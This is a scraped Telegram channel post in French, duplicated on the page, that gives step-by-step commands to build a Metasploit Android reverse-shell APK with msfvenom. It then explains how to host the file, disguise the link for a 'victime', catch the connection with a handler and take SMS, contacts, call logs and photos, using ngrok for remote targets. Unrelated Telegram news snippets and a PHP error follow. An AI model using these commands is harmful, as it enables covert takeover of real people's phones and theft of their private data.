Telegram Group & Telegram Channel
🔰 Avoir accès à un téléphone grâce à metasploit 🔰

🎯 Metasploit est disponible sur Kali , Ubuntu et aussi sur Windows

Les amoureux de termux peuvent l'utiliser aussi

Dans mon car j'utilise Kali linux

Pour commencer ouvrir votre terminal et taper 👇

#msfvenom -p android/meterpreter/reverse_tcp LHOST=”Votre Adresse IP” LPORT=4444 R /root/Bureau/android.apk

Pour connaître son IP :
ifconfig

Un fois le Payload généré envoyer le juste à votre vitime ou vous pouvez l'introduire dans votre serveur et envoyé ça à votre vitime sous forme d'un lien avec la commande :
# cp /root/Bureau/android.apk /var/www/html

Ensuite démarré votre service apache2

Ensuite envoyer le lien Ă  votre vitime : votre IP/android.apk

Vous pouvez toute fois modifier le lien pour que ça soit jolie que ça juste pour ne pas éveiller les soupçons

🎯Démarrage de Métasploit

Maintenant aller dans votre terminal ou ouvrir d'autres fenêtre et taper 👇

# msfconsole
# use exploit/multi/handler
# set payload android/meterpreter/reverse_tcp
# set LHOST Votre Adresse IP
# set LPORT 4444
# exploit

Maintenant vous avez accès au téléphone de votre vitime

Pour se déplacer dans le dossier Download du Téléphone de la cible taper 👇
# cd /sdcard/Download
Vous pouvez faire beaucoup de truc du genre avoir tous les SMS , contact , les appels effectuer , les photos et aussi télécharger des trucs sur le téléphone vitime .. etc

NB: votre vitime doit être sur le même réseau que vous dans le cas contraire vous devez utiliser un tunnel comme ngrok

Pour ce faire aller télécharger ngrok puis l'installer (aller sur Google) ensuite taper dans votre terminal 👇
# ./ngrok tcp 4444
Maintenant il suffit juste de remplacer votre IP par : 0.tcp.ngrok.oi et le port par : 18728 comme sur la photo et Boom đź’Ą

Mon Télégramme :@Re_dexx



group-telegram.com/ethical_hackingr/417
Create:
Last Update:

🔰 Avoir accès à un téléphone grâce à metasploit 🔰

🎯 Metasploit est disponible sur Kali , Ubuntu et aussi sur Windows

Les amoureux de termux peuvent l'utiliser aussi

Dans mon car j'utilise Kali linux

Pour commencer ouvrir votre terminal et taper 👇

#msfvenom -p android/meterpreter/reverse_tcp LHOST=”Votre Adresse IP” LPORT=4444 R /root/Bureau/android.apk

Pour connaître son IP :
ifconfig

Un fois le Payload généré envoyer le juste à votre vitime ou vous pouvez l'introduire dans votre serveur et envoyé ça à votre vitime sous forme d'un lien avec la commande :
# cp /root/Bureau/android.apk /var/www/html

Ensuite démarré votre service apache2

Ensuite envoyer le lien Ă  votre vitime : votre IP/android.apk

Vous pouvez toute fois modifier le lien pour que ça soit jolie que ça juste pour ne pas éveiller les soupçons

🎯Démarrage de Métasploit

Maintenant aller dans votre terminal ou ouvrir d'autres fenêtre et taper 👇

# msfconsole
# use exploit/multi/handler
# set payload android/meterpreter/reverse_tcp
# set LHOST Votre Adresse IP
# set LPORT 4444
# exploit

Maintenant vous avez accès au téléphone de votre vitime

Pour se déplacer dans le dossier Download du Téléphone de la cible taper 👇
# cd /sdcard/Download
Vous pouvez faire beaucoup de truc du genre avoir tous les SMS , contact , les appels effectuer , les photos et aussi télécharger des trucs sur le téléphone vitime .. etc

NB: votre vitime doit être sur le même réseau que vous dans le cas contraire vous devez utiliser un tunnel comme ngrok

Pour ce faire aller télécharger ngrok puis l'installer (aller sur Google) ensuite taper dans votre terminal 👇
# ./ngrok tcp 4444
Maintenant il suffit juste de remplacer votre IP par : 0.tcp.ngrok.oi et le port par : 18728 comme sur la photo et Boom đź’Ą

Mon Télégramme :@Re_dexx

BY Ethical Hacking teams


Warning: Undefined variable $i in /var/www/group-telegram/post.php on line 260

Share with your friend now:
group-telegram.com/ethical_hackingr/417

View MORE
Open in Telegram


Telegram | DID YOU KNOW?

Date: |

Also in the latest update is the ability for users to create a unique @username from the Settings page, providing others with an easy way to contact them via Search or their t.me/username link without sharing their phone number. But Kliuchnikov, the Ukranian now in France, said he will use Signal or WhatsApp for sensitive conversations, but questions around privacy on Telegram do not give him pause when it comes to sharing information about the war. He said that since his platform does not have the capacity to check all channels, it may restrict some in Russia and Ukraine "for the duration of the conflict," but then reversed course hours later after many users complained that Telegram was an important source of information. Oh no. There’s a certain degree of myth-making around what exactly went on, so take everything that follows lightly. Telegram was originally launched as a side project by the Durov brothers, with Nikolai handling the coding and Pavel as CEO, while both were at VK. In December 2021, Sebi officials had conducted a search and seizure operation at the premises of certain persons carrying out similar manipulative activities through Telegram channels.
from ye


Telegram Ethical Hacking teams
FROM American